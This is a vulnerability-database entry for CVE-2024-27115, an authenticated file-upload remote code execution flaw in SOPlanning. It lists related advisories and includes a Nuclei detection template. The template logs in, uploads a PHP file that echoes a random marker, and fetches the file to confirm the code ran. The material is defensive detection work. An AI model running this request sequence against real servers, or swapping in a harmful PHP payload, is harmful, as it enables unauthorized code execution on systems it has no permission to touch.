| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2024-27115 | 11 Sep 202417:00 | – | circl | |
| SOPlanning 安全漏洞 | 11 Sep 202400:00 | – | cnnvd | |
| CVE-2024-27115 | 11 Sep 202413:41 | – | cve | |
| CVE-2024-27115 Remote Code Execution through File Upload in SOPlanning before 1.52.02 | 11 Sep 202413:41 | – | cvelist | |
| CVE-2024-27115 | 11 Sep 202414:15 | – | nvd | |
| CVE-2024-27115 | 11 Sep 202414:15 | – | osv | |
| CVE-2024-27115 | 23 May 202510:32 | – | redhatcve | |
| CVE-2024-27115 Remote Code Execution through File Upload in SOPlanning before 1.52.02 | 11 Sep 202413:41 | – | vulnrichment |
| Source | Link |
|---|---|
| exploit-db | www.exploit-db.com/exploits/52082 |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2024-27115 |
id: CVE-2024-27115
info:
name: SOPlanning - Remote Code Execution
author: [email protected]
severity: high
description: |
Detects a remote code execution vulnerability in SOPlanning version 1.52.01 through authenticated PHP file upload.
impact: |
Authenticated attackers can upload and execute arbitrary PHP files through the SOPlanning upload functionality, achieving remote code execution.
remediation: |
Update SOPlanning to a version newer than 1.52.01.
reference:
- https://www.exploit-db.com/exploits/52082
- https://nvd.nist.gov/vuln/detail/CVE-2024-27115
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/S:N/AU:Y/R:I/V:C/RE:M/U:Red
cvss-score: 10.0
cve-id: CVE-2024-27115
cwe-id: CWE-434
epss-score: 0.0459
epss-percentile: 0.90502
cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:*
tags: cve,cve2024,soplanning,rce,authenticated,file-upload,intrusive,vuln
variables:
username: "{{username}}"
password: "{{password}}"
filename: "{{rand_base(5)}}"
http:
- raw:
- |
POST /process/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login={{username}}&password={{password}}
- |
POST /process/upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=0ccdfeede39eb97743b39d87536933e1
--0ccdfeede39eb97743b39d87536933e1
Content-Disposition: form-data; name="linkid"
soonghee
--0ccdfeede39eb97743b39d87536933e1
Content-Disposition: form-data; name="periodeid"
0
--0ccdfeede39eb97743b39d87536933e1
Content-Disposition: form-data; name="fichiers"
{{randstr}}.php
--0ccdfeede39eb97743b39d87536933e1
Content-Disposition: form-data; name="type"
upload
--0ccdfeede39eb97743b39d87536933e1
Content-Disposition: form-data; name="fichier-0"; filename="{{filename}}.php"
Content-Type: application/x-php
<?php echo '{{randstr}}'; ?>
--0ccdfeede39eb97743b39d87536933e1--
- |
GET /upload/files/soonghee/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- '{{randstr}}'
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
# digest: 4a0a00473045022100a96f0b4ca37afc563ba5c52db61db43ba4293569984a44555aee14d24f8c39d4022034bfdf97e04914c27a2b307db90b8daf4f2c72e29526e11d9b4721f30aa848ce:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation